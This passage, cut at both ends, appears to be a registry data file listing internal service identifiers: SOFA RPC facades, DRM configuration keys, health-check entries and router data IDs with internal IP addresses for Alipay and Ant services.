ANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.XflushErrorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.globalsite.facade.api.fund.FundAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.YouthAckCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.plugin.lock.LockService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.123.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csmobile.service.rpc.api.ServProdGwService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdispute.facade.api.TradeInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","gmodelcenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.quotationcore.common.service.facade.api.manual.EventEnhancementManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@idpatrol#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mcenter.common.service.facade.McenterUserConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.TelPhoneInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.150.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundcore.trade.service.facade.FinFundTradeWorkdayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.209.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkcreditgrowup.common.facade.api.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditcoop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.limit.RuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundbudget.facade.api.TwoPhaseShadowFundBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.QueryInstDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanDecisionSwitchDrm.cutFlowToPcldStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:imobileprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.decisionx.engine.common.api.DecisionStatusService:1.0:ant_public@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.switchLisaZproxy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.181.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudlego:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finasmcore.common.service.facade.promo.service.PromoConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.apcontainersrv.common.service.facade.linke.LinkEDeploymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.181.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbordersync.common.service.facade.spi.KoaOrderPushProcessCallback:1.0:koa-merchantapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.facade.consumecenter.ConsumerRecordQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dchainconfigcenter.facade.config.api.ConfigurationAdminService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opensupport.common.service.facade.admin.BlackAndWhiteListManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ProfileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SwitchToUtpResource.signFeatures,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tradefront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:iopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:identitymatrix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.common.service.facade.NotifyProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.ding.DingGroupChatServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.troublehunter.common.service.facade.api.report.TroubleInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.18.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:opencore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbatch.service.DebtCollectionDataManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.FinnetInfoLdcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mydds@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.normalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.switchSceneWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:openhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.storage.StorageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ofpgrowth.common.service.facade.api.EquityAccumulationRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agmcenter.common.service.facade.api.ProtocolInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.anna.facade.ReplayQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.innertrans.facade.api.InnerAccountManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:chair-mosn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.5.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:accordercorexx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.assets.InstAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.intellibroadcastrobot.CommonDataSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kgmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_RCSERVICEBUS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecogateway.service.notify.facade.NotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.querySwitchV2On,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finvirtualta.core.service.fund.repository.FinShareRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linka.common.service.facade.coverage.CoverageFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.merchant.common.service.facade.MerchantCertificateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.excashier.common.service.facade.api.ExcashierService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTDSM#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.89.157.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.prodmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodcore.common.service.bizprodmodel.facade.BizProdModelQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.reachshop.ReachShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.AreaManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.api.activity.BFActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.findefencecore.common.service.anna.facade.BigthingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.custprod.service.api.CardCipherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.loadDataSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.baitiaoprod.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:airprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.globalprod.common.service.facade.SystemConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payplus.common.service.facade.api.PayAuthRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developertool.facade.resource.ConfigIterationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bklid.facade.api.interflow.ManualFinanceOrderMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alphad.common.service.facade.datamng.api.AdfCollectionMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.publiccore.common.service.facade.app.PublicCustomExtensionInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.stock.stockDiscoveryTopicsItemCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@keymap#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","cn.amberdata.admin.service.CommonService:1.0:commonService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:ol-valid-mgt-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.checker.ConsumeCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpproject@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.openapi.ProdOpenCommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatProcessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.claim.facade.AssetClaimApplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:cif_alias_modify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.debittrans.service.facade.aptrans.api.AptransManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insusercore.biz.facade.InsUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdecision.service.PcreditAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.api.download.DownloadViewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lightmds.service.mds.MdsDatasetLockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.huanyu.facade.core.change.PlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.76.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.checkroute.common.service.datacollect.HADataClientConfigDrm.enableLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.publishing.common.facade.submit.PrePublishSpi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.service.facade.api.PrizeSendOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.localcacheProvider,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchdtunical.common.service.facade.http.SchedulerRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbadvert@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.core.dwm.service.upgrade.data.rectification.dependence.DependenceInitService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.schedule.ScheduleBatchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundselling.common.service.productx.facade.ProductXStateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.AutoInsightTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.api.VirtualFundIdentityAuthService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.business.business.BusinessCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.rdsguard.drm.RdsSystemSwitchDrmResource.systemSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.96.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.scheduler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_FINFUNDPROTOCOL#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xxePayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:grayEngineChangeServiceCheckCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.yqdataservice.common.service.facade.search.YqSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.troublehunter.common.service.facade.api.metric.XflushMonitorQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intl.idatadeveloperbase.facade.IdataServiceRpc:1.0:dataservice_cn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.148.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antcloud.usercenter.common.service.facade.access.AccessManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.dr.DRSwitchDispatcher:1.0:scheduler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskdatacenter.core.service.limit.scure.DecisionExecutorCoordinator:1.0:capacityExecutorCoordinator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.GrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.echox.drm.EchoxDataGatherDrm.echoxGatherConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cif.facade.ProfileQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.socialcore.facade.operation.ActivityRevisitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.prod.OAuthAgentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.search.ShopSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.ucm.masterdata.InstContactQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mydds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.CodeAttackCIFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbasecore.service.library.facade.LibraryAuthQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.CustomerCommonQuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.rule.open.RuleManageOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.174.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.icbcenter.service.facade.api.ChargebackOccurVostroService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.assets.api.facade.service.SearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ofpgrowth.common.service.facade.api.ResultPageEquityConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.qconsole.facade.conf.AntqRouteMetaFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpwm.facade.aip.FundFixedDecisionWrapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.NotifyClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.131.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rtss.common.service.facade.easytree.EasyTreeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.api.FinResourceAssignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:mtmallcard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.disableSchemeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditprod.service.PcreditAuthVoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.appclient.process.ProcessFlowAccessor:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:pcreditdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.LocalCacheResource.systemParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antmember.common.service.facade.goldeneye.consult.GoldenEyeConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.appxagg.common.service.facade.api.management.community.CommunityServiceApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.core.change.PlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.dataoperation.component.BizAppSaveDataOperateService:1.0:antmember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cloud.metaservice.facade.cell.CellFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.instriskcenter.facade.api.RiskMonitorRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditkit.facade.operationconfig.ConfigProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxFlatOrderTaskExecutor@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchpay.common.service.facade.bptb.BatchPayBankContractService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.SessionItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unitradeprod.common.facade.service.NotifyAgentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CloudCategoryVideoExpansionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudinc.common.service.facade.dns.DnsDomainOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdtrans.common.service.facade.api.PdTransferQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.BatchDeductCmd.data,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.industry.IndustryBelongChangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iecpprod.common.service.facade.api.AcquireOrderAndPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.fortunetask.FortuneTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.report.MerchantReportInService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echo.platform.playback.task.data.PlaybackDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MINICORE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_INST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.iotcube.common.service.facade.page.ProductUpgradeBaseInfoIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","HEALTHY_V2@antiep#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.bumng.common.service.facade.PsUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tsm.common.service.facade.rpc.spi.TsmDataServiceFacade:1.0:mobilecodec@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.common.manage.facade.api.CacheManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue48#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iprobe.common.service.facade.api.LogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ctu.service.analyze.api.CtuAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.vote.VoteGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_TRADEINTG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.UserSecurityService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_yudian_test_yd_sim@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_F_IRECON#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinquotationprod.common.service.facade.api.FundEstimateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.159.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.clivemng.common.service.facade.api.skillgroup.v2.SkillGroupNewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msfluxconf:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.dumpLogByCond,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.playbackmng.zplayback.manytimescompare.ManyTimesCompareTaskManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCac